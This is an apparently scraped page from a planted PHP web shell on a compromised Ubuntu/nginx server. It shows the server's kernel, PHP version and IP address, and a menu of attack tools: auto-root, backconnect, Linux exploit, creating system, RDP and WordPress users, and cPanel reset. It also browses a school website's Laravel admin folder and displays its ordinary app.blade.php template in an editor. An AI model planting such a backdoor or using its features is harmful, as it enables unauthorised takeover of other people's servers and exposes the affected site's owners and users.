Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gandhi-school /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
aboutus
[ DIR ]
drwxrwxr-x
album
[ DIR ]
drwxrwxr-x
carousell
[ DIR ]
drwxrwxr-x
committee
[ DIR ]
drwxrwxr-x
committee_type
[ DIR ]
drwxrwxr-x
contact_person
[ DIR ]
drwxrwxr-x
executive_committee_term
[ DIR ]
drwxrwxr-x
master_committee
[ DIR ]
drwxrwxr-x
member
[ DIR ]
drwxrwxr-x
member_type
[ DIR ]
drwxrwxr-x
news
[ DIR ]
drwxrwxr-x
notice
[ DIR ]
drwxrwxr-x
pta_term
[ DIR ]
drwxrwxr-x
publication
[ DIR ]
drwxrwxr-x
recent-news
[ DIR ]
drwxrwxr-x
setup
[ DIR ]
drwxrwxr-x
suchana
[ DIR ]
drwxrwxr-x
team
[ DIR ]
drwxrwxr-x
video
[ DIR ]
drwxrwxr-x
app.blade.php
13.96
KB
-rw-rw-r--
dashboard.blade.php
2.14
KB
-rw-rw-r--
footer.blade.php
238
B
-rw-rw-r--
index.blade.php
41.93
KB
-rw-rw-r--
menu.blade.php
3.48
KB
-rw-rw-r--
sidebar.blade.php
5.41
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.blade.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title></title> <!-- Custom fonts for this template--> <link href="/admin-dashboard/vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet"> <!-- Custom styles for this template--> <link href="/admin-dashboard/css/sb-admin-2.min.css" rel="stylesheet"> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous"> {{-- <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.0/js/select2.full.min.js"></script> --}} <!-- Searchable select options --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/selectize.js/0.12.6/js/standalone/selectize.min.js" integrity="sha256-+C0A5Ilqmu4QcSPxrlGpaZxJ04VjsRjKu+G82kl5UJk=" crossorigin="anonymous"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/selectize.js/0.12.6/css/selectize.bootstrap3.min.css" integrity="sha256-ze/OEYGcFbPRmvCnrSeKbRTtjG4vGLHXgOqsyLFTRjg=" crossorigin="anonymous" /> <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" /> <link rel="stylesheet" href="/css/style.css"> {{-- <link rel="stylesheet" href="admin-dashboard/css/sb-admin-2.css"> --}} <style> @font-face { font-family: 'Preeti'; src: href('/Preeti/Preeti.otf'); } #nepali { font-family: Preeti; } #popupContainer { display: flex; justify-content: center; align-items: center; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); /* Semi-transparent background */ z-index: 9999; /* Ensure it's on top of other content */ } #loadingSpinner img { width: 50px; /* Adjust size as needed */ height: 50px; /* Adjust size as needed */ animation: spin 1s linear infinite; /* Example animation */ } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> @yield('styles') <link rel="stylesheet" type="text/css" href="//cdn.datatables.net/1.12.1/css/jquery.dataTables.min.css"> {{-- <link rel="stylesheet" href="public/css-s/style.css"> --}} <link rel="stylesheet" href="/css-s/style.css"> </head> <body id="page-top"> <!-- Page Wrapper --> <div id="wrapper"> <!-- Sidebar --> <ul class="navbar-nav bg-gradient-primary sidebar sidebar-dark accordion" id="accordionSidebar"> @include('admin.sidebar') </ul> <!-- End of Sidebar --> <!-- Content Wrapper --> <div id="content-wrapper" class="d-flex flex-column"> <!-- Main Content --> <div id="content"> <nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow"> <!-- Sidebar Toggle (Topbar) --> <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3"> <i class="fa fa-bars"></i> </button> <!-- Topbar Search --> <form class="d-none d-sm-inline-block form-inline mr-auto ml-md-3 my-2 my-md-0 mw-100 navbar-search"> <div class="input-group"> <input type="text" class="form-control bg-light border-0 small" placeholder="Search for..." aria-label="Search" aria-describedby="basic-addon2"> <div class="input-group-append"> <button class="btn btn-primary" type="button"> <i class="fas fa-search fa-sm"></i> </button> </div> </div> </form> <!-- Topbar Navbar --> <ul class="navbar-nav ml-auto"> <!-- Nav Item - Search Dropdown (Visible Only XS) --> <li class="nav-item dropdown no-arrow d-sm-none"> <a class="nav-link dropdown-toggle" href="#" id="searchDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fas fa-search fa-fw"></i> </a> <!-- Dropdown - Messages --> <div class="dropdown-menu dropdown-menu-right p-3 shadow animated--grow-in" aria-labelledby="searchDropdown"> <form class="form-inline mr-auto w-100 navbar-search"> <div class="input-group"> <input type="text" class="form-control bg-light border-0 small" placeholder="Search for..." aria-label="Search" aria-describedby="basic-addon2"> <div class="input-group-append"> <button class="btn btn-primary" type="button"> <i class="fas fa-search fa-sm"></i> </button> </div> </div> </form> </div> </li> <!-- Nav Item - Alerts --> <li class="nav-item dropdown no-arrow mx-1"> <a class="nav-link dropdown-toggle" href="#" id="alertsDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fas fa-bell fa-fw"></i> <!-- Counter - Alerts --> <span class="badge badge-danger badge-counter">3+</span> </a> </li> <div class="topbar-divider d-none d-sm-block"></div> <!-- Nav Item - User Information --> <li class="nav-item dropdown no-arrow"> <a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{-- <span class="mr-2 d-none d-lg-inline text-gray-600 small"> {{ Auth::user()->name }}</span> --}} <img class="img-profile rounded-circle" src="/frontend/images/default_avatar.png"> </a> <!-- Dropdown - User Information --> <div class="dropdown-menu dropdown-menu-right shadow animated--grow-in" aria-labelledby="userDropdown"> <a class="dropdown-item" href="/setup"> <i class="fas fa-wrench fa-sm fa-fw mr-2 text-gray-400"></i> Settings </a> {{-- <a class="dropdown-item" href="#"> <i class="fas fa-cogs fa-sm fa-fw mr-2 text-gray-400"></i> Settings </a> --}} <a class="dropdown-item" href="/contact_persons"> <i class="fas fa-user fa-sm fa-fw mr-2 text-gray-400"></i> Contact Person </a> <a class="dropdown-item" href="/change-password"> <i class="fas fa-key fa-sm fa-fw mr-2 text-gray-400"></i> Change Password </a> <div class="dropdown-divider"></div> <a class="dropdown-item" href="/logout" data-toggle="modal" data-target="#logoutModal"> <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-gray-400"></i> Logout </a> </div> </li> </ul> </nav> <!-- End of Topbar --> <div style="min-height: 76vh;"> @yield('content') </div> </div> <!-- End of Main Content --> <!-- Footer --> @include('admin.footer') <!-- End of Footer --> </div> <!-- End of Content Wrapper --> </div> <!-- End of Page Wrapper --> <!-- Scroll to Top Button--> <a class="scroll-to-top rounded" href="#page-top"> <i class="fas fa-angle-up"></i> </a> <div id="popupContainer" style="display:none;"> <div id="loadingSpinner"> <!-- Loading spinner animation (e.g., spinner.gif) --> <img src="/admin-dashboard/img/spinnner.gif" alt="Loading..." /> </div> </div> <!-- Logout Modal--> <div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5> <button class="close" type="button" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <form id="logout-form" action="{{ url('logout') }}" method="POST"> {{ csrf_field() }} <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div> <div class="modal-footer"> <button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button> <button class="btn btn-primary" type="submit">Logout</button> </div> </div> </form> </div> </div> @if ($message = Session::get('error')) <div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="false"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">something Went Wrong</h5> </div> </div> </div> </div> @endif {{-- Select 2 link --}} {{-- <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script> --}} <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js"></script> <!-- Bootstrap core JavaScript--> {{-- <script src="/admin-dashboard/vendor/jquery/jquery.min.js"></script> --}} <script src="/admin-dashboard/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- Core plugin JavaScript--> <script src="/admin-dashboardvendor/jquery-easing/jquery.easing.min.js"></script> <!-- Custom scripts for all pages--> <script src="/admin-dashboard/js/sb-admin-2.min.js"></script> <script src="https://cdn.ckeditor.com/ckeditor5/34.2.0/classic/ckeditor.js"></script> <!-- Page level plugins --> {{-- <script src="/admin-dashboard/vendor/chart.js/Chart.min.js"></script> --}} <!-- Page level custom scripts --> {{-- <script src="/admin-dashboard/js/demo/chart-area-demo.js"></script> <script src="/admin-dashboard/js/demo/chart-pie-demo.js"></script> --}} @yield('javascripts') <script type="text/javascript" charset="utf8" src="//cdn.datatables.net/1.12.1/js/jquery.dataTables.min.js"></script> <script> $(document).ready(function() { $('#datatable').DataTable(); responsive: true; }); </script> <script> $(document).ready(function() { $('#datatable2').DataTable(); responsive: true; }); </script> <script> $(document).ready(function() { $('.select2').select2(); }); </script> <script> ClassicEditor .create( document.querySelector( '#editor' ), { ckfinder: { uploadUrl: '/upload-image' }, headers: { 'X-CSRF-TOKEN': '{{ csrf_token() }}' } }) .then( editor => { editor.ui.view.editable.element.style.height = '300px'; }) .catch( error => { console.error( error ); }); </script> </body> </html>
Close